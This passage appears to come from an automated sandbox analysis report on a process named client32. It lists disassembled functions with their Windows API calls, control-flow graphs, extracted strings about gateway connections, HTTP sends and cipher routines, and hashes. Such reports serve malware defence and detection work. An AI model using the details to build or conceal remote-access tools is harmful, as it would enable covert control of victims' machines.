                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6EEF64A3
                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6EEFD77B,00000000), ref: 6EEF64C5
                                                                              • shutdown.WSOCK32(?,00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF64E9
                                                                              • GetLastError.KERNEL32(?,00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF64F2
                                                                              • timeGetTime.WINMM(?,00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6510
                                                                              • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6526
                                                                              • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6533
                                                                              • timeGetTime.WINMM(?,00000000,?,6EEFD77B,00000000), ref: 6EEF6540
                                                                              • Sleep.KERNEL32(00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF654B
                                                                              • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6563
                                                                              • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6574
                                                                              • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF657D
                                                                              • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF658E
                                                                              • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF659E
                                                                              • _memset.LIBCMT ref: 6EEF65C8
                                                                              • LeaveCriticalSection.KERNEL32(?,?,6EEFD77B,00000000), ref: 6EEF65D7
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898,?,00000000,?,6EEFD77B,00000000), ref: 6EEF65F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                              • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                              • API String ID: 3764039262-2631155478
                                                                              • Opcode ID: e7cf5c6f81519337c51056a1e4f5718799656627da67c22f28e71c2c22781c7d
                                                                              • Instruction ID: 244669a2023ee2f62774b257a3a8a5b16c21f663809e65d6d7a0990f5901dcd3
                                                                              • Opcode Fuzzy Hash: e7cf5c6f81519337c51056a1e4f5718799656627da67c22f28e71c2c22781c7d
                                                                              • Instruction Fuzzy Hash: 2051E971624B06DFDB20EFE4C884B9573BABF89319F200915E909D7284E7B0E845CBE0
                                                                              Function 6EEF98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2775 6eef98d0-6eef9932 2776 6eef9956-6eef995e 2775->2776 2777 6eef9934-6eef9955 call 6eef30a0 call 6ef128e1 2775->2777 2779 6eef9ac5-6eef9acc 2776->2779 2780 6eef9964-6eef9979 call 6ef128f0 2776->2780 2782 6eef9ace-6eef9adb 2779->2782 2783 6eef9b19-6eef9b1d 2779->2783 2780->2779 2793 6eef997f-6eef9994 call 6ef14330 2780->2793 2786 6eef9add-6eef9af6 wsprintfA 2782->2786 2787 6eef9af8-6eef9b07 wsprintfA 2782->2787 2788 6eef9b1f-6eef9b26 2783->2788 2789 6eef9b4b-6eef9b70 GetTickCount InterlockedExchange EnterCriticalSection 2783->2789 2794 6eef9b0a-6eef9b16 call 6eef52b0 2786->2794 2787->2794 2788->2789 2795 6eef9b28-6eef9b41 call 6eef77b0 2788->2795 2791 6eef9b9c-6eef9ba1 2789->2791 2792 6eef9b72-6eef9b9b LeaveCriticalSection call 6eef30a0 call 6ef128e1 2789->2792 2799 6eef9bfb-6eef9c05 2791->2799 2800 6eef9ba3-6eef9bd0 call 6eef4dd0 2791->2800 2793->2779 2811 6eef999a-6eef99af call 6ef128f0 2793->2811 2794->2783 2795->2789 2816 6eef9b43-6eef9b45 2795->2816 2807 6eef9c3b-6eef9c47 2799->2807 2808 6eef9c07-6eef9c17 2799->2808 2823 6eef9d4b-6eef9d6c LeaveCriticalSection call 6ef077e0 2800->2823 2824 6eef9bd6-6eef9bf6 WSAGetLastError call 6eef30a0 2800->2824 2812 6eef9c50-6eef9c5a 2807->2812 2814 6eef9c19-6eef9c1d 2808->2814 2815 6eef9c20-6eef9c22 2808->2815 2811->2779 2834 6eef99b5-6eef99f1 2811->2834 2821 6eef9d2e-6eef9d3b call 6eef30a0 2812->2821 2822 6eef9c60-6eef9c65 2812->2822 2814->2815 2817 6eef9c1f 2814->2817 2815->2807 2818 6eef9c24-6eef9c36 call 6eef46c0 2815->2818 2816->2789 2817->2815 2818->2807 2840 6eef9d45 2821->2840 2829 6eef9c67-6eef9c6b 2822->2829 2830 6eef9c71-6eef9c9a send 2822->2830 2838 6eef9d6e-6eef9d72 InterlockedIncrement 2823->2838 2839 6eef9d78-6eef9d8a call 6ef128e1 2823->2839 2824->2823 2829->2821 2829->2830 2835 6eef9c9c-6eef9c9f 2830->2835 2836 6eef9cf1-6eef9d0f call 6eef30a0 2830->2836 2841 6eef99f7-6eef99ff 2834->2841 2842 6eef9cbe-6eef9cce WSAGetLastError 2835->2842 2843 6eef9ca1-6eef9cac 2835->2843 2836->2840 2838->2839 2840->2823 2847 6eef9a05-6eef9a08 2841->2847 2848 6eef9aa3-6eef9ac2 call 6eef30a0 2841->2848 2849 6eef9d11-6eef9d2c call 6eef30a0 2842->2849 2850 6eef9cd0-6eef9ce9 timeGetTime Sleep 2842->2850 2843->2840 2851 6eef9cb2-6eef9cbc 2843->2851 2855 6eef9a0e 2847->2855 2856 6eef9a0a-6eef9a0c 2847->2856 2848->2779 2849->2840 2850->2812 2857 6eef9cef 2850->2857 2851->2850 2860 6eef9a14-6eef9a1d 2855->2860 2856->2860 2857->2840 2861 6eef9a1f-6eef9a22 2860->2861 2862 6eef9a8d-6eef9a8e 2860->2862 2863 6eef9a26-6eef9a35 2861->2863 2864 6eef9a24 2861->2864 2862->2848 2865 6eef9a37-6eef9a3a 2863->2865 2866 6eef9a90-6eef9a93 2863->2866 2864->2863 2867 6eef9a3e-6eef9a4d 2865->2867 2868 6eef9a3c 2865->2868 2869 6eef9a9d 2866->2869 2870 6eef9a4f-6eef9a52 2867->2870 2871 6eef9a95-6eef9a98 2867->2871 2868->2867 2869->2848 2872 6eef9a56-6eef9a65 2870->2872 2873 6eef9a54 2870->2873 2871->2869 2874 6eef9a9a 2872->2874 2875 6eef9a67-6eef9a6a 2872->2875 2873->2872 2874->2869 2876 6eef9a6e-6eef9a85 2875->2876 2877 6eef9a6c 2875->2877 2876->2841 2878 6eef9a8b 2876->2878 2877->2876 2878->2848
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                              • API String ID: 909875538-2848211065
                                                                              • Opcode ID: 7c50ab3a33b63770fe0815867e2d0cdc93b869b6a3863dece58b6977c5f92084
                                                                              • Instruction ID: 03fca40053fc26cc4994e4bb331fbc1ddc2685e7e2b86e294ec354d328fb764b
                                                                              • Opcode Fuzzy Hash: 7c50ab3a33b63770fe0815867e2d0cdc93b869b6a3863dece58b6977c5f92084
                                                                              • Instruction Fuzzy Hash: A1D1E571A14219DFDB20CFE4C890BD9B775AF4A308F2441DAD84D9B345E732998ACF91
                                                                              Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2879 11028c10-11028c2d 2880 11028c33-11028c62 2879->2880 2881 110292f8-110292ff 2879->2881 2884 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2880->2884 2885 11028c68-11028c6e 2880->2885 2882 11029311-11029315 2881->2882 2883 11029301-1102930a 2881->2883 2887 11029317-11029329 call 11162bb7 2882->2887 2888 1102932a-1102933e call 11162bb7 2882->2888 2883->2882 2886 1102930c 2883->2886 2900 11028d3d 2884->2900 2890 11028c70-11028c78 2885->2890 2886->2882 2890->2890 2894 11028c7a-11028c80 2890->2894 2895 11028c83-11028c88 2894->2895 2895->2895 2899 11028c8a-11028c94 2895->2899 2901 11028cb1-11028cb7 2899->2901 2902 11028c96-11028c9d 2899->2902 2903 11028d40-11028d4a 2900->2903 2907 11028cb8-11028cbe 2901->2907 2906 11028ca0-11028ca6 2902->2906 2904 11028d50-11028d53 2903->2904 2905 110292ef-110292f7 2903->2905 2904->2905 2908 11028d59-11028d67 call 11026ef0 2904->2908 2905->2881 2906->2906 2909 11028ca8-11028cae 2906->2909 2907->2907 2910 11028cc0-11028cee call 11164ead 2907->2910 2915 11029275-1102928a call 11164c77 2908->2915 2916 11028d6d-11028d80 call 11163ca7 2908->2916 2909->2901 2910->2903 2915->2905 2923 11029290-110292ea 2915->2923 2921 11028d82-11028d85 2916->2921 2922 11028d8b-11028db3 call 11026d60 call 11026ef0 2916->2922 2921->2915 2921->2922 2922->2915 2928 11028db9-11028dd6 call 11026fe0 call 11026ef0 2922->2928 2923->2905 2933 110291e5-110291ec 2928->2933 2934 11028ddc 2928->2934 2936 11029212-11029219 2933->2936 2937 110291ee-110291f1 2933->2937 2935 11028de0-11028e00 call 11026d60 2934->2935 2949 11028e02-11028e05 2935->2949 2950 11028e36-11028e39 2935->2950 2938 11029231-11029238 2936->2938 2939 1102921b-11029221 2936->2939 2937->2936 2941 110291f3-110291fa 2937->2941 2944 1102923a-11029245 2938->2944 2945 11029248-1102924f 2938->2945 2943 11029227-1102922f 2939->2943 2942 11029200-11029210 2941->2942 2942->2936 2942->2942 2943->2938 2943->2943 2944->2945 2947 11029251-1102925b 2945->2947 2948 1102925e-11029265 2945->2948 2947->2948 2948->2915 2953 11029267-11029272 2948->2953 2951 11028e07-11028e0e 2949->2951 2952 11028e1e-11028e21 2949->2952 2954 110291ce-110291df call 11026ef0 2950->2954 2955 11028e3f-11028e52 call 11165010 2950->2955 2956 11028e14-11028e1c 2951->2956 2952->2954 2958 11028e27-11028e31 2952->2958 2953->2915 2954->2933 2954->2935 2955->2954 2962 11028e58-11028e74 call 1116558e 2955->2962 2956->2952 2956->2956 2958->2954 2965 11028e76-11028e7c 2962->2965 2966 11028e8f-11028ea5 call 1116558e 2962->2966 2967 11028e80-11028e88 2965->2967 2971 11028ea7-11028ead 2966->2971 2972 11028ebf-11028ed5 call 1116558e 2966->2972 2967->2967 2969 11028e8a 2967->2969 2969->2954 2973 11028eb0-11028eb8 2971->2973 2977 11028ed7-11028edd 2972->2977 2978 11028eef-11028f05 call 1116558e 2972->2978 2973->2973 2975 11028eba 2973->2975 2975->2954 2980 11028ee0-11028ee8 2977->2980 2983 11028f07-11028f0d 2978->2983 2984 11028f1f-11028f35 call 1116558e 2978->2984 2980->2980 2981 11028eea 2980->2981 2981->2954 2985 11028f10-11028f18 2983->2985 2989 11028f37-11028f3d 2984->2989 2990 11028f4f-11028f65 call 1116558e 2984->2990 2985->2985 2987 11028f1a 2985->2987 2987->2954 2991 11028f40-11028f48 2989->2991 2995 11028f67-11028f6d 2990->2995 2996 11028f7f-11028f95 call 1116558e 2990->2996 2991->2991 2993 11028f4a 2991->2993 2993->2954 2997 11028f70-11028f78 2995->2997 3001 11028f97-11028f9d 2996->3001 3002 11028faf-11028fc5 call 1116558e 2996->3002 2997->2997 2999 11028f7a 2997->2999 2999->2954 3003 11028fa0-11028fa8 3001->3003 3007 11028fc7-11028fcd 3002->3007 3008 11028fdf-11028ff5 call 1116558e 3002->3008 3003->3003 3005 11028faa 3003->3005 3005->2954 3010 11028fd0-11028fd8 3007->3010 3013 11028ff7-11028ffd 3008->3013 3014 1102900f-11029025 call 1116558e 3008->3014 3010->3010 3012 11028fda 3010->3012 3012->2954 3015 11029000-11029008 3013->3015 3019 11029027-1102902d 3014->3019 3020 1102903f-11029055 call 1116558e 3014->3020 3015->3015 3017 1102900a 3015->3017 3017->2954 3021 11029030-11029038 3019->3021 3025 11029057-1102905d 3020->3025 3026 1102906f-11029085 call 1116558e 3020->3026 3021->3021 3023 1102903a 3021->3023 3023->2954 3028 11029060-11029068 3025->3028 3031 110290a6-110290bc call 1116558e 3026->3031 3032 11029087-1102908d 3026->3032 3028->3028 3029 1102906a 3028->3029 3029->2954 3037 110290d3-110290e9 call 1116558e 3031->3037 3038 110290be 3031->3038 3033 11029097-1102909f 3032->3033 3033->3033 3035 110290a1 3033->3035 3035->2954 3043 11029100-11029116 call 1116558e 3037->3043 3044 110290eb 3037->3044 3039 110290c4-110290cc 3038->3039 3039->3039 3041 110290ce 3039->3041 3041->2954 3049 11029137-1102914d call 1116558e 3043->3049 3050 11029118-1102911e 3043->3050 3045 110290f1-110290f9 3044->3045 3045->3045 3047 110290fb 3045->3047 3047->2954 3055 1102916f-11029185 call 1116558e 3049->3055 3056 1102914f-1102915f 3049->3056 3051 11029128-11029130 3050->3051 3051->3051 3053 11029132 3051->3053 3053->2954 3061 11029187-1102918d 3055->3061 3062 1102919c-110291b2 call 1116558e 3055->3062 3058 11029160-11029168 3056->3058 3058->3058 3060 1102916a 3058->3060 3060->2954 3063 11029190-11029198 3061->3063 3062->2954 3067 110291b4-110291ba 3062->3067 3063->3063 3065 1102919a 3063->3065 3065->2954 3068 110291c4-110291cc 3067->3068 3068->2954 3068->3068
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74D41370,?,0000001A), ref: 11028CFD
                                                                              • _strrchr.LIBCMT ref: 11028D0C
                                                                                • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModuleName__stricmp_l_strrchr
                                                                              • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                              • API String ID: 1609618855-357498123
                                                                              • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                              • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                              • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                              • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                              Function 6EF06BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 6EF06BD5
                                                                              • GetTickCount.KERNEL32 ref: 6EF06C26
                                                                              • Sleep.KERNEL32(00000064), ref: 6EF06C5B
                                                                                • Part of subcall function 6EF06940: GetTickCount.KERNEL32 ref: 6EF06950
                                                                              • WaitForSingleObject.KERNEL32(0000031C,?), ref: 6EF06C7C
                                                                              • _memmove.LIBCMT ref: 6EF06C93
                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6EF06CB4
                                                                              • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6EF06CD9
                                                                              • GetTickCount.KERNEL32 ref: 6EF06CEC
                                                                              • _calloc.LIBCMT ref: 6EF06D76
                                                                              • GetTickCount.KERNEL32 ref: 6EF06DF3
                                                                              • InterlockedExchange.KERNEL32(037F2D5A,00000000), ref: 6EF06E01
                                                                              • _calloc.LIBCMT ref: 6EF06E33
                                                                              • _memmove.LIBCMT ref: 6EF06E47
                                                                              • InterlockedDecrement.KERNEL32(037F2D02), ref: 6EF06EC3
                                                                              • SetEvent.KERNEL32(00000324), ref: 6EF06ECF
                                                                              • _memmove.LIBCMT ref: 6EF06EF4
                                                                              • GetTickCount.KERNEL32 ref: 6EF06F4F
                                                                              • InterlockedExchange.KERNEL32(037F2CA2,-6EF3A188), ref: 6EF06F60
                                                                              Strings
                                                                              • ResumeTimeout, xrefs: 6EF06BBA
                                                                              • FALSE, xrefs: 6EF06E67
                                                                              • ProcessMessage returned FALSE. Terminating connection, xrefs: 6EF06F25
                                                                              • httprecv, xrefs: 6EF06BDD
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6EF06E62
                                                                              • ReadMessage returned FALSE. Terminating connection, xrefs: 6EF06F3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                              • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                              • API String ID: 1449423504-919941520
                                                                              • Opcode ID: 639abb3234b573ca1d7f616aca7b981de7677b15ea10cb8587379398a0bd6a8d
                                                                              • Instruction ID: 41de51a0b9cd570ed3e315178f033d7ef204a581e99ab0fbb922438fe5ebe768
                                                                              • Opcode Fuzzy Hash: 639abb3234b573ca1d7f616aca7b981de7677b15ea10cb8587379398a0bd6a8d
                                                                              • Instruction Fuzzy Hash: BDB1B2B1D20668DBDF20DFA4CC64BD973B9EB48304F01449AE949A7640E7B49AC4DFA1
                                                                              Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                              • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(02CD8D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                              • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1620732580-3468083601
                                                                              • Opcode ID: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                              • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                              • Opcode Fuzzy Hash: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                              • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                              Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                              • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                              • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                              • API String ID: 2201880244-3035937465
                                                                              • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                              • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                              • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                              • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                              Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
